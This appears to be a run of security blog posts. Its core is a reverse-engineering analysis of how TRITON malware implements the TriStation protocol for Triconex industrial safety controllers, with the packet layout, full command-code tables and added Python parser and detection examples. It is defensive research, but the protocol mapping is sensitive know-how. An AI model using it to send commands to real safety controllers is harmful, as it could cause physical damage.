For this problem, we leverage our in-house big data platform engine that we integrated into FireEye Helix following the acquisition of X15 Software. By loading the results of hundreds of thousands of emulations into the X15 engine, our analysts can hunt through the results at scale and identify anomalous behaviors such as unique screen prints, unusual initial jump offsets, or patterns in disk reads or writes.

This analysis at scale helps us identify new and interesting samples to reverse engineer, and ultimately helps us identify new detection signatures that feed back into our analytic engine.

Conclusion

Within weeks of going live we detected previously unknown compromised systems in multiple customer environments. We’ve identified everything from ROCKBOOT and HDRoot! bootkits to the admittedly humorous JackTheRipper, a bootkit that spreads itself via floppy disk (no joke). Our system has collected and processed nearly 650,000 unique records to date and continues to find the evil needles (suspicious and malicious boot records) in very large haystacks.

In summary, by combining advanced endpoint boot record extraction with scalable serverless computing and an automated emulation engine, we can rapidly analyze thousands of records in search of evil. FireEye is now using this solution in both our Managed Defense and Incident Response offerings.

Acknowledgements

Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett contributed to this blog post.

A Totally Tubular Treatise on TRITON and TriStation

Introduction

In December 2017, FireEye's Mandiant discussed an incident response involving the TRITON framework. The TRITON attack and many of the publicly discussed ICS intrusions involved routine techniques where the threat actors used only what is necessary to succeed in their mission. For both INDUSTROYER and TRITON, the attackers moved from the IT network to the OT (operational technology) network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz distillates, remote desktop sessions, and other well-documented, easily-detected attack methods were used throughout these intrusions.

Despite the routine techniques employed to gain access to an OT environment, the threat actors behind the TRITON malware framework invested significant time learning about the Triconex Safety Instrumented System (SIS) controllers and TriStation, a proprietary network communications protocol. The investment and purpose of the Triconex SIS controllers leads Mandiant to assess the attacker's objective was likely to build the capability to cause physical consequences.

TriStation remains closed source and there is no official public information detailing the structure of the protocol, raising several questions about how the TRITON framework was developed. Did the actor have access to a Triconex controller and TriStation 1131 software suite? When did development first start? How did the threat actor reverse engineer the protocol, and to what extent? What is the protocol structure?

FireEye’s Advanced Practices Team was born to investigate adversary methodologies, and to answer these types of questions, so we started with a deeper look at TRITON’s own Python scripts.

Glossary:

  • TRITON – Malware framework designed to operate Triconex SIS controllers via the TriStation protocol.
  • TriStation – UDP network protocol specific to Triconex controllers.
  • TRITON threat actor – The human beings who developed, deployed and/or operated TRITON.

Diving into TRITON's Implementation of TriStation

TriStation is a proprietary network protocol and there is no public documentation detailing its structure or how to create software applications that use TriStation. The current TriStation UDP/IP protocol is little understood, but natively implemented through the TriStation 1131 software suite. TriStation operates by UDP over port 1502 and allows for communications between designated masters (PCs with the software that are “engineering workstations”) and slaves (Triconex controllers with special communications modules) over a network.

To us, the Triconex systems, software and associated terminology sound foreign and complicated, and the TriStation protocol is no different. Attempting to understand the protocol from ground zero would take a considerable amount of time and reverse engineering effort – so why not learn from TRITON itself? With the TRITON framework containing TriStation communication functionality, we pursued studying the framework to better understand this mysterious protocol. Work smarter, not harder, amirite?

The TRITON framework has a multitude of functionalities, but we started with the basic components:

  • TS_cnames.pyc # Compiled at: 2017-08-03 10:52:33
  • TsBase.pyc # Compiled at: 2017-08-03 10:52:33
  • TsHi.pyc # Compiled at: 2017-08-04 02:04:01
  • TsLow.pyc # Compiled at: 2017-08-03 10:46:51

TsLow.pyc (Figure 1) contains several pieces of code for error handling, but these also present some cues to the protocol structure.


Figure 1: TsLow.pyc function print_last_error()

In TsLow.pyc’s print_last_error function we see error handling for “TCM Error”. This compares the TriStation packet value at offset 0 with a value in a corresponding array from TS_cnames.pyc (Figure 2), which is largely used as a “dictionary” for the protocol.


Figure 2: TS_cnames.pyc TS_cst array

From this we can infer that offset 0 of the TriStation protocol contains message types. This is supported by an additional function, tcm_result, which declares type, size = struct.unpack('<HH', data_received[0:4]), stating that the first two bytes should be handled as integer type and the second two bytes are integer size of the TriStation message. This is our first glimpse into what the threat actor(s) understood about the TriStation protocol.

Since there are only 11 defined message types, it really doesn't matter much if the type is one byte or two because the second byte will always be 0x00.

We also have indications that message type 5 is for all Execution Command Requests and Responses, so it is curious to observe that the TRITON developers called this “Command Reply.” (We won’t understand this naming convention until later.)

Next we examine TsLow.pyc’s print_last_error function (Figure 3) to look at “TS Error” and “TS_names.” We begin by looking at the ts_err variable and see that it references ts_result.


Figure 3: TsLow.pyc function print_last_error() with ts_err highlighted

We follow that thread to ts_result, which defines a few variables in the next 10 bytes (Figure 4): dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). Now things are heating up. What fun. There’s a lot to unpack here, but the most interesting thing is how this piece of the script breaks down 10 bytes from ts_packet into different variables.


Figure 4: ts_result with ts_packet header variables highlighted


Figure 5: tcm_result

Referencing tcm_result (Figure 5) we see that it defines type and size as the first four bytes (offset 0 – 3) and tcm_result returns the packet bytes 4:-2 (offset 4 to the end minus 2, because the last two bytes are the CRC-16 checksum). Now that we know where tcm_result leaves off, we know that the ts_reply “cmd” is a single byte at offset 6, and corresponds to the values in the TS_cnames.pyc array and TS_names (Figure 6). The TRITON script also tells us that any integer value over 100 is a likely “command reply.” Sweet.

When looking back at the ts_result packet header definitions, we begin to see some gaps in the TRITON developer's knowledge: dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). We're clearly speculating based on naming conventions, but we get an impression that offsets 4, 5 and 6 could be "direction", "controller ID" and "command", respectively. Values such as "unk" show that the developer either did not know or did not care to identify this value. We suspect it is a constant, but this value is still unknown to us.


Figure 6: Excerpt from the TS_cnames.pyc TS_names array, which contains the TRITON actor’s notes for execution command function codes

TriStation Protocol Packet Structure

The TRITON threat actor’s knowledge and reverse engineering effort provides us a better understanding of the protocol. From here we can start to form a more complete picture and document the basic functionality of TriStation. We are primarily interested in message type 5, Execution Command, which best illustrates the overall structure of the protocol. Other, smaller message types will have varying structure.


Figure 7: Sample TriStation "Allocate Program" Execution Command, with color annotation and protocol legend
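A parser for the TriStation framing as the post reconstructs it from TsLow.pyc, added here as an example and not code from TRITON or FireEye. It decodes only what the text supports (type and size at offsets 0-3, dir/cid/cmd at offsets 4-6, a trailing CRC-16, command values over 100 treated as replies); the CRC-16/ARC variant, little-endian CRC byte order, the size field meaning total frame length, and the sample frames are assumptions.

```python
"""TriStation framing as reconstructed from TRITON's TsLow.pyc (tcm_result and
ts_result, discussed above).

Layout taken from the text:
  offset 0-1  message type, uint16 LE (type 5 = Execution Command; high byte 0x00)
  offset 2-3  size, uint16 LE
  offset 4    dir   - field names are TRITON's own guesses; only "cmd" is
  offset 5    cid     confirmed as a function code whose values over 100
  offset 6    cmd     are replies
  offset 7..  cnt/unk/cks/siz, widths not stated in the post, left undecoded here
  last 2      CRC-16 trailer
Assumptions not on the page: CRC-16/ARC (poly 0x8005, reflected), CRC stored
little-endian, and size == total frame length.
"""
import struct
from dataclasses import dataclass
from typing import List

EXECUTION_COMMAND = 5
MESSAGE_TYPES = {EXECUTION_COMMAND: "Execution Command"}  # the only type the post names
REPLY_THRESHOLD = 100                                     # "any integer value over 100"


def crc16_arc(data: bytes) -> int:
    """CRC-16/ARC: reflected poly 0xA001, init 0, no final xor (assumed variant)."""
    crc = 0
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc


@dataclass(frozen=True)
class TriStationMessage:
    msg_type: int
    size: int
    direction: int
    controller_id: int
    command: int
    trailer: bytes          # cnt/unk/cks/siz region, kept raw
    crc_received: int
    crc_computed: int
    frame_length: int

    @property
    def type_name(self) -> str:
        return MESSAGE_TYPES.get(self.msg_type, f"type {self.msg_type} (not named in the post)")

    @property
    def is_reply(self) -> bool:
        return self.command > REPLY_THRESHOLD

    @property
    def crc_ok(self) -> bool:
        return self.crc_received == self.crc_computed

    def anomalies(self) -> List[str]:
        """Cheap integrity checks a passive network monitor could apply per frame."""
        out = []
        if not self.crc_ok:
            out.append("CRC-16 trailer does not match frame contents")
        if self.msg_type > 0xFF:
            out.append("message type high byte non-zero (only 11 types are defined)")
        if self.size != self.frame_length:
            out.append(f"size field {self.size} != frame length {self.frame_length} (assumed semantics)")
        return out


def parse_tristation(packet: bytes) -> TriStationMessage:
    # 4-byte TCM header, at least dir/cid/cmd, and the 2-byte CRC
    if len(packet) < 9:
        raise ValueError("frame too short for TCM header, command byte and CRC-16")
    msg_type, size = struct.unpack("<HH", packet[0:4])    # as in tcm_result
    body = packet[4:-2]                                     # tcm_result returns bytes 4:-2
    (crc_received,) = struct.unpack("<H", packet[-2:])
    return TriStationMessage(
        msg_type=msg_type, size=size,
        direction=body[0], controller_id=body[1], command=body[2],
        trailer=bytes(body[3:]),
        crc_received=crc_received, crc_computed=crc16_arc(packet[:-2]),
        frame_length=len(packet),
    )


def constructed_frame(msg_type: int, direction: int, cid: int, command: int,
                      trailer: bytes = b"\x00" * 7) -> bytes:
    """Test vector for the parser only; every field beyond cmd is assumed."""
    body = bytes([direction, cid, command]) + trailer
    frame = struct.pack("<HH", msg_type, 4 + len(body) + 2) + body
    return frame + struct.pack("<H", crc16_arc(frame))


# Constructed samples: a request, a reply-range counterpart, and a corrupted copy.
REQUEST = constructed_frame(EXECUTION_COMMAND, 1, 0, 30)
REPLY = constructed_frame(EXECUTION_COMMAND, 2, 0, 130)
TAMPERED = REQUEST[:6] + bytes([REQUEST[6] ^ 0xFF]) + REQUEST[7:]   # flipped cmd byte


def summarize(packet: bytes) -> str:
    m = parse_tristation(packet)
    kind = "reply" if m.is_reply else "request"
    flags = "; ".join(m.anomalies()) or "no anomalies"
    return f"{m.type_name} {kind} cmd={m.command} dir={m.direction} cid={m.controller_id}: {flags}"


if __name__ == "__main__":
    for frame in (REQUEST, REPLY, TAMPERED):
        print(summarize(frame))
```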

Corroborating the TriStation Analysis

Minute discrepancies aside, the TriStation structure detailed in Figure 7 is supported by other public analyses. Foremost, researchers from the Coordinated Science Laboratory (CSL) at University of Illinois at Urbana-Champaign published a 2017 paper titled "Attack Induced Common-Mode Failures on PLC-based Safety System in a Nuclear Power Plant". The CSL team mentions that they used the Triconex System Access Application (TSAA) protocol to reverse engineer elements of the TriStation protocol. TSAA is a protocol developed by the same company as TriStation. Unlike TriStation, the TSAA protocol structure is described within official documentation. CSL assessed similarities between the two protocols would exist and they leveraged TSAA to better understand TriStation. The team's overall research and analysis of the general packet structure aligns with our TRITON-sourced packet structure.

There are some awesome blog posts and whitepapers out there that support our findings in one way or another. Writeups by Midnight Blue Labs, Accenture, and US-CERT each explain how the TRITON framework relates to the TriStation protocol in superb detail.

TriStation's Reverse Engineering and TRITON's Development

When TRITON was discovered, we began to wonder how the TRITON actor reverse engineered TriStation and implemented it into the framework. We have a lot of theories, all of which seemed plausible: Did they build, buy, borrow, or steal? Or some combination thereof?

Our initial theory was that the threat actor purchased a Triconex controller and software for their own testing and reverse engineering from the "ground up", although if this was the case we do not believe they had a controller with the exact vulnerable firmware version, else they would have had fewer problems with TRITON in practice at the victim site. They may have bought or used a demo version of the TriStation 1131 software, allowing them to reverse engineer enough of TriStation for the framework. They may have stolen TriStation Python libraries from ICS companies, subsidiaries or system integrators and used the stolen material as a base for TriStation and TRITON development. But then again, it is possible that they borrowed TriStation software, Triconex hardware and Python connectors from a government-owned utility that was using them legitimately.

Looking at the raw TRITON code, some of the comments may appear oddly phrased, but we do get a sense that the developer is clearly using many of the right vernacular and acronyms, showing smarts on PLC programming. The TS_cnames.pyc script contains interesting typos such as 'Set lable', 'Alocate network accepted', 'Symbol table ccepted' and 'Set program information reponse'. These appear to be normal human error and reflect neither poor written English nor laziness in coding. The significant amount of annotation, cascading logic, and robust error handling throughout the code suggests thoughtful development and testing of the framework. This complicates the theory of "ground up" development, so did they base their code on something else?

While learning from the TriStation functionality within TRITON, we continued to explore legitimate TriStation software. We began our search for "TS1131.exe" and hit dead ends sorting through TriStation DLLs until we came across a variety of TriStation utilities in MSI form. We ultimately stumbled across a juicy archive containing "Trilog v4." Upon further inspection, this file installed "TriLog.exe," which the original TRITON executable mimicked, and a couple of supporting DLLs, all of which were timestamped around August 2006.

When we saw the DLL file description "Tricon Communications Interface" and original file name "TricCom.DLL", we knew we were in the right place. With a simple look at the file strings, "BAZINGA!" We struck gold.

| Field | Value |
|---|---|
| File Name | tr1com40.dll |
| MD5 | 069247DF527A96A0E048732CA57E7D3D |
| Size | 110592 |
| Compile Date | 2006-08-23 |
| File Description | Tricon Communications Interface |
| Product Name | TricCom Dynamic Link Library |
| File Version | 4.2.441 |
| Original File Name | TricCom.DLL |
| Copyright | Copyright © 1993-2006 Triconex Corporation |

The tr1com40.DLL is exactly what you would expect to see in a custom application package. It is a library that helps support the communications for a Triconex controller. If you've pored over TRITON as much as we have, the moment you look at strings you can see the obvious overlaps between the legitimate DLL and TRITON's own TS_cnames.pyc.


Figure 8: Strings excerpt from tr1com40.DLL

Each of the execution command "error codes" from TS_cnames.pyc are in the strings of tr1com40.DLL (Figure 8). We see "An MP has re-educated" and "Invalid Tristation I command". Even misspelled command strings appear verbatim, such as "Non-existant data item" and "Alocate network accepted". We also see many of the same unknown values. What is obvious from this discovery is that some of the strings in TRITON are likely based on code used in communications libraries for Trident and Tricon controllers.

In our brief survey of the legitimate Triconex Corporation binaries, we observed a few samples with related string tables.

Pe:dllname     Compile Date   Reference CPP Strings Code
Lagcom40.dll   2004/11/19     $Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0
Tr1com40.dll   2006/08/23     $Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4
Tridcom.dll    2008/07/23     $Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0
Triccom.dll    2008/07/23     $Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4
Tridcom.dll    2010/09/29     $Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0
Tr1com.dll     2011/04/27     $Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4
Lagcom.dll     2011/04/27     $Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0
Triccom.dll    2011/04/27     $Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

We extracted the CPP string tables in TR1STRS and LAGSTRS and the TS_cnames.pyc TS_names array from TRITON, and compared the 210, 204, and 212 relevant strings from each respective file.

TS_cnames.pyc TS_names and tr1com40.dll share 202 of 220 combined table strings. The remaining strings are unique to each, as seen here:

TS_cnames.TS_names (2017 pyc)    Tr1com40.dll (2006 CPP)
Go to DOWNLOAD mode              <200>
Not set                          <209>
Unk75                            Bad message from module
Unk76                            Bad message type
Unk77                            Bad TMI version number
Unk78                            Module did not respond
Unk79                            Open Connection: Invalid SAP %d
Unk81                            Unsupported message for this TMI version
Unk83
Wrong command

TS_cnames.pyc TS_names and Tridcom.dll (1999 CPP) shared only 151 of 268 combined table strings, showing a much smaller overlap with the seemingly older CPP library. This makes sense based on the context that Tridcom.dll is meant for a Trident controller, not a Tricon controller. It does seem as though Tr1com40.dll and TR1STRS.CPP code was based on older work.

We are not shocked to find that the threat actor reversed legitimate code to bolster development of the TRITON framework. They want to work smarter, not harder, too. But after reverse engineering legitimate software and implementing the basics of the TriStation, the threat actors still had an incomplete understanding of the protocol. In TRITON's TS_cnames.pyc we saw "Unk75", "Unk76", "Unk83" and other values that were not present in the tr1com40.DLL strings, indicating that the TRITON threat actor may have explored the protocol and annotated their findings beyond what they reverse engineered from the DLL. The gaps in TriStation implementation show us why the actors encountered problems interacting with the Triconex controllers when using TRITON in the wild.

You can see more of the Trilog and Triconex DLL files on VirusTotal.

Item Name           MD5                                 Description
Tr1com40.dll        069247df527a96a0e048732ca57e7d3d    Tricom Communications DLL
Data1.cab           e6a3c93a6d433cbaf6f573b6c09d76c4    Parent of Tr1com40.dll
Trilog v4.1.360R    13a3b83ba2c4236ca59aba679941c8a5    RAR Archive of TriLog
TridCom.dll         5c2ed617fdec4779cb33c89082a43100    Trident Communications DLL

Afterthoughts

Seeing Triconex systems targeted with malicious intent was new to the world six months ago. Moving forward it would be reasonable to anticipate additional frameworks, such as TRITON, designed for usage against other SIS controllers and associated technologies. If Triconex was within scope, we may see similar attacker methodologies affecting the dominant industrial safety technologies.

Basic security measures do little to thwart truly persistent threat actors, and monitoring only IT networks is not an ideal situation. Visibility into both the IT and OT environments is critical for detecting the various stages of an ICS intrusion. Simple detection concepts such as baseline deviation can provide insight into abnormal activity.

While the TRITON framework was actively in use, how many traditional ICS “alarms” were set off while the actors tested their exploits and backdoors on the Triconex controller? How many times did the TriStation protocol, as implemented in their Python scripts, fail or cause errors because of non-standard traffic? How many TriStation UDP pings were sent and how many Connection Requests? How did these statistics compare to the baseline for TriStation traffic? There are no answers to these questions for now. We believe that we can identify these anomalies in the long run if we strive for increased visibility into ICS technologies.

We hope that by holding public discussions about ICS technologies, the Infosec community can cultivate closer relationships with ICS vendors and give the world better insight into how attackers move from the IT to the OT space. We want to foster more conversations like this and generally share good techniques for finding evil. Since almost all ICS attacks involve standard IT intrusions, we should probably come together to invent and improve guidelines for how to monitor PCs and engineering workstations that bridge the IT and OT networks. We envision a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time, and their freedom. It's an ideal world, but something nice to shoot for.

Thanks and Future Work

There is still much to do for TRITON and TriStation. There are many more sub-message types and nuances for parsing out the nitty gritty details, which is hard to do without a controller of our own. And although we’ve published much of what we learned about the TriStation here on the blog, our work will continue as we continue our study of the protocol.

Thanks to everyone who did so much public research on TRITON and TriStation. We have cited a few individuals in this blog post, but there is a lot more community-sourced information that gave us clues and leads for our research and testing of the framework and protocol. We also have to acknowledge the research performed by the TRITON attackers. We borrowed a lot of your knowledge about TriStation from the TRITON framework itself.

Finally, remember that we're here to collaborate. We think most of our research is right, but if you notice any errors or omissions, or have ideas for improvements, please spear phish contact: smiller@fireeye.com.

Recommended Reading

Appendix A: TriStation Message Type Codes

The following table consists of hex values at offset 0 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x0   Message Type
1              Connection Request
2              Connection Response
3              Disconnect Request
4              Disconnect Response
5              Execution Command
6              Ping Command
7              Connection Limit Reached
8              Not Connected
9              MPS Are Dead
10             Access Denied
11             Connection Failed

Appendix B: TriStation Execution Command Function Codes

The following table consists of hex values at offset 6 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x6   TS_cnames String
0              0: 'Start download all',
1              1: 'Start download change',
2              2: 'Update configuration',
3              3: 'Upload configuration',
4              4: 'Set I/O addresses',
5              5: 'Allocate network',
6              6: 'Load vector table',
7              7: 'Set calendar',
8              8: 'Get calendar',
9              9: 'Set scan time',
A              10: 'End download all',
B              11: 'End download change',
C              12: 'Cancel download change',
D              13: 'Attach TRICON',
E              14: 'Set I/O address limits',
F              15: 'Configure module',
10             16: 'Set multiple point values',
11             17: 'Enable all points',
12             18: 'Upload vector table',
13             19: 'Get CP status ',
14             20: 'Run program',
15             21: 'Halt program',
16             22: 'Pause program',
17             23: 'Do single scan',
18             24: 'Get chassis status',
19             25: 'Get minimum scan time',
1A             26: 'Set node number',
1B             27: 'Set I/O point values',
1C             28: 'Get I/O point values',
1D             29: 'Get MP status',
1E             30: 'Set retentive values',
1F             31: 'Adjust clock calendar',
20             32: 'Clear module alarms',
21             33: 'Get event log',
22             34: 'Set SOE block',
23             35: 'Record event log',
24             36: 'Get SOE data',
25             37: 'Enable OVD',
26             38: 'Disable OVD',
27             39: 'Enable all OVDs',
28             40: 'Disable all OVDs',
29             41: 'Process MODBUS',
2A             42: 'Upload network',
2B             43: 'Set lable',
2C             44: 'Configure system variables',
2D             45: 'Deconfigure module',
2E             46: 'Get system variables',
2F             47: 'Get module types',
30             48: 'Begin conversion table download',
31             49: 'Continue conversion table download',
32             50: 'End conversion table download',
33             51: 'Get conversion table',
34             52: 'Set ICM status',
35             53: 'Broadcast SOE data available',
36             54: 'Get module versions',
37             55: 'Allocate program',
38             56: 'Allocate function',
39             57: 'Clear retentives',
3A             58: 'Set initial values',
3B             59: 'Start TS2 program download',
3C             60: 'Set TS2 data area',
3D             61: 'Get TS2 data',
3E             62: 'Set TS2 data',
3F             63: 'Set program information',
40             64: 'Get program information',
41             65: 'Upload program',
42             66: 'Upload function',
43             67: 'Get point groups',
44             68: 'Allocate symbol table',
45             69: 'Get I/O address',
46             70: 'Resend I/O address',
47             71: 'Get program timing',
48             72: 'Allocate multiple functions',
49             73: 'Get node number',
4A             74: 'Get symbol table',
4B             75: 'Unk75',
4C             76: 'Unk76',
4D             77: 'Unk77',
4E             78: 'Unk78',
4F             79: 'Unk79',
50             80: 'Go to DOWNLOAD mode',
51             81: 'Unk81',
52             (no entry)
53             83: 'Unk83',
54-63          (no entry)
64             100: 'Command rejected',
65             101: 'Download all permitted',
66             102: 'Download change permitted',
67             103: 'Modification accepted',
68             104: 'Download cancelled',
69             105: 'Program accepted',
6A             106: 'TRICON attached',
6B             107: 'I/O addresses set',
6C             108: 'Get CP status response',
6D             109: 'Program is running',
6E             110: 'Program is halted',
6F             111: 'Program is paused',
70             112: 'End of single scan',
71             113: 'Get chassis configuration response',
72             114: 'Scan period modified',
73             115: '<115>',
74             116: '<116>',
75             117: 'Module configured',
76             118: '<118>',
77             119: 'Get chassis status response',
78             120: 'Vectors response',
79             121: 'Get I/O point values response',
7A             122: 'Calendar changed',
7B             123: 'Configuration updated',
7C             124: 'Get minimum scan time response',
7D             125: '<125>',
7E             126: 'Node number set',
7F             127: 'Get MP status response',
80             128: 'Retentive values set',
81             129: 'SOE block set',
82             130: 'Module alarms cleared',
83             131: 'Get event log response',
84             132: 'Symbol table ccepted',
85             133: 'OVD enable accepted',
86             134: 'OVD disable accepted',
87             135: 'Record event log response',
88             136: 'Upload network response',
89             137: 'Get SOE data response',
8A             138: 'Alocate network accepted',
8B             139: 'Load vector table accepted',
8C             140: 'Get calendar response',
8D             141: 'Label set',
8E             142: 'Get module types response',
8F             143: 'System variables configured',
90             144: 'Module deconfigured',
91             145: '<145>',
92             146: '<146>',
93             147: 'Get conversion table response',
94             148: 'ICM print data sent',
95             149: 'Set ICM status response',
96             150: 'Get system variables response',
97             151: 'Get module versions response',
98             152: 'Process MODBUS response',
99             153: 'Allocate program response',
9A             154: 'Allocate function response',
9B             155: 'Clear retentives response',
9C             156: 'Set initial values response',
9D             157: 'Set TS2 data area response',
9E             158: 'Get TS2 data response',
9F             159: 'Set TS2 data response',
A0             160: 'Set program information reponse',
A1             161: 'Get program information response',
A2             162: 'Upload program response',
A3             163: 'Upload function response',
A4             164: 'Get point groups response',
A5             165: 'Allocate symbol table response',
A6             166: 'Program timing response',
A7             167: 'Disable points full',
A8             168: 'Allocate multiple functions response',
A9             169: 'Get node number response',
AA             170: 'Symbol table response',
AB-C7          (no entry)
C8             200: 'Wrong command',
C9             201: 'Load is in progress',
CA             202: 'Bad clock calendar data',
CB             203: 'Control program not halted',
CC             204: 'Control program checksum error',
CD             205: 'No memory available',
CE             206: 'Control program not valid',
CF             207: 'Not loading a control program',
D0             208: 'Network is out of range',
D1             209: 'Not enough arguments',
D2             210: 'A Network is missing',
D3             211: 'The download time mismatches',
D4             212: 'Key setting prohibits this operation',
D5             213: 'Bad control program version',
D6             214: 'Command not in correct sequence',
D7             215: '<215>',
D8             216: 'Bad Index for a module',
D9             217: 'Module address is invalid',
DA             218: '<218>',
DB             219: '<219>',
DC             220: 'Bad offset for an I/O point',
DD             221: 'Invalid point type',
DE             222: 'Invalid Point Location',
DF             223: 'Program name is invalid',
E0             224: '<224>',
E1             225: '<225>',
E2             226: '<226>',
E3             227: 'Invalid module type',
E4             228: '<228>',
E5             229: 'Invalid table type',
E6             230: '<230>',
E7             231: 'Invalid network continuation',
E8             232: 'Invalid scan time',
E9             233: 'Load is busy',
EA             234: 'An MP has re-educated',
EB             235: 'Invalid chassis or slot',
EC             236: 'Invalid SOE number',
ED             237: 'Invalid SOE type',
EE             238: 'Invalid SOE state',
EF             239: 'The variable is write protected',
F0             240: 'Node number mismatch',
F1             241: 'Command not allowed',
F2             242: 'Invalid sequence number',
F3             243: 'Time change on non-master TRICON',
F4             244: 'No free Tristation ports',
F5             245: 'Invalid Tristation I command',
F6             246: 'Invalid TriStation 1131 command',
F7             247: 'Only one chassis allowed',
F8             248: 'Bad variable address',
F9             249: 'Response overflow',
FA             250: 'Invalid bus',
FB             251: 'Disable is not allowed',
FC             252: 'Invalid length',
FD             253: 'Point cannot be disabled',
FE             254: 'Too many retentive variables',
FF             255: 'LOADER_CONNECT',
(none)         256: 'Unknown reject code'
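The two appendices document exactly two header fields: the message type at offset 0 and the execution command function code at offset 6. The Afterthoughts section asks how many UDP pings and Connection Requests were sent and how that compared to a baseline. The following Python is an added example, not code from the FireEye post or from the TRITON framework, that labels those two bytes with the appendix dictionaries (a subset of Appendix B, strings kept verbatim) and keeps per-source counts of message types, raising an alert when a state-changing command arrives from a host outside a known set of engineering workstations. Everything beyond the two documented offsets is an assumption: that each field is a single byte, that the offset-6 code is only decoded for Execution Command messages, the watch list of state-changing commands, the zero-padded sample packets and the baseline host list.

```python
from collections import Counter

# Appendix A: message type at offset 0.
MESSAGE_TYPES = {
    1: "Connection Request", 2: "Connection Response",
    3: "Disconnect Request", 4: "Disconnect Response",
    5: "Execution Command", 6: "Ping Command",
    7: "Connection Limit Reached", 8: "Not Connected",
    9: "MPS Are Dead", 10: "Access Denied", 11: "Connection Failed",
}

# Subset of Appendix B: function code at offset 6 (TS_cnames strings verbatim).
FUNCTION_CODES = {
    0: "Start download all", 1: "Start download change", 10: "End download all",
    19: "Get CP status ", 20: "Run program", 21: "Halt program",
    29: "Get MP status", 80: "Go to DOWNLOAD mode", 100: "Command rejected",
    108: "Get CP status response", 200: "Wrong command",
    245: "Invalid Tristation I command",
}

CONNECTION_REQUEST = 1
EXECUTION_COMMAND = 5
PING_COMMAND = 6

# Assumed watch list: commands that alter the controller's program or run state.
STATE_CHANGING = {0, 1, 10, 20, 21, 80}


def decode(payload):
    """Label the two documented header bytes of one TriStation UDP payload."""
    if not payload:
        raise ValueError("empty payload")
    mtype = payload[0]
    rec = {"type": mtype, "type_name": MESSAGE_TYPES.get(mtype, "<%d>" % mtype),
           "function": None, "function_name": None}
    # Assumption: the offset-6 function code is only meaningful for Execution Commands.
    if mtype == EXECUTION_COMMAND and len(payload) > 6:
        fc = payload[6]
        rec["function"] = fc
        rec["function_name"] = FUNCTION_CODES.get(fc, "<%d>" % fc)
    return rec


def summarize(capture, known_workstations):
    """Count message types per source and flag state-changing commands from unknown hosts."""
    counts = Counter()
    alerts = []
    for src, payload in capture:
        rec = decode(payload)
        counts[(src, rec["type_name"])] += 1
        if rec["function"] in STATE_CHANGING and src not in known_workstations:
            alerts.append((src, rec["function_name"]))
    return counts, alerts


def pkt(mtype, fc=0):
    """Constructed payload: only bytes 0 and 6 carry meaning, the rest is zero padding."""
    return bytes([mtype, 0, 0, 0, 0, 0, fc, 0])


# Constructed capture of (source IP, payload) pairs and a constructed baseline.
CAPTURE = [
    ("10.10.1.5", pkt(CONNECTION_REQUEST)),
    ("10.10.1.5", pkt(PING_COMMAND)),
    ("10.10.1.5", pkt(EXECUTION_COMMAND, 29)),   # Get MP status
    ("10.10.9.77", pkt(CONNECTION_REQUEST)),
    ("10.10.9.77", pkt(EXECUTION_COMMAND, 80)),  # Go to DOWNLOAD mode
    ("10.10.9.77", pkt(EXECUTION_COMMAND, 0)),   # Start download all
]
KNOWN_WORKSTATIONS = {"10.10.1.5"}

if __name__ == "__main__":
    counts, alerts = summarize(CAPTURE, KNOWN_WORKSTATIONS)
    for key, n in sorted(counts.items()):
        print(key, n)
    for alert in alerts:
        print("ALERT", alert)
```

The per-source counters are the raw material for the baseline the post describes: a workstation that normally sends a handful of pings and status reads per shift looks very different from a host that opens a connection and immediately issues download-mode commands.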

Remote Authentication GeoFeasibility Tool – GeoLogonalyzer

Users have long needed to access important resources such as virtual private networks (VPNs), web applications, and mail servers from anywhere in the world at any time. While the ability to access resources from anywhere is imperative for employees, threat actors often leverage stolen credentials to access systems and data. Due to large volumes of remote access connections, it can be difficult to distinguish between a legitimate and a malicious login.

Today, we are releasing GeoLogonalyzer to help organizations analyze logs to identify malicious logins based on GeoFeasibility; for example, a user connecting to a VPN from New York at 13:00 is unlikely to legitimately connect to the VPN from Australia five minutes later.

Once remote authentication activity is baselined across an environment, analysts can begin to identify authentication activity that deviates from business requirements and normalized patterns, such as:

  1. User accounts that authenticate from two distant locations, and at times between which the user probably could not have physically travelled the route.
  2. User accounts that usually log on from IP addresses registered to one physical location such as a city, state, or country, but also have logons from locations where the user is not likely to be physically located.
  3. User accounts that log on from a foreign location at which no employees reside or are expected to travel to, and your organization has no business contacts at that location.
  4. User accounts that usually log on from one source IP address, subnet, or ASN, but have a small number of logons from a different source IP address, subnet, or ASN.
  5. User accounts that usually log on from home or work networks, but also have logons from an IP address registered to cloud server hosting providers.
  6. User accounts that log on from multiple source hostnames or with multiple VPN clients.

GeoLogonalyzer can help address these and similar situations by processing authentication logs containing timestamps, usernames, and source IP addresses.

GeoLogonalyzer can be downloaded from our FireEye GitHub.

GeoLogonalyzer Features

IP Address GeoFeasibility Analysis

For a remote authentication log that records a source IP address, it is possible to estimate the location each logon originated from using data such as MaxMind’s free GeoIP database. With additional information, such as a timestamp and username, analysts can identify a change in source location over time to determine if that user could have possibly traveled between those two physical locations to legitimately perform the logons.

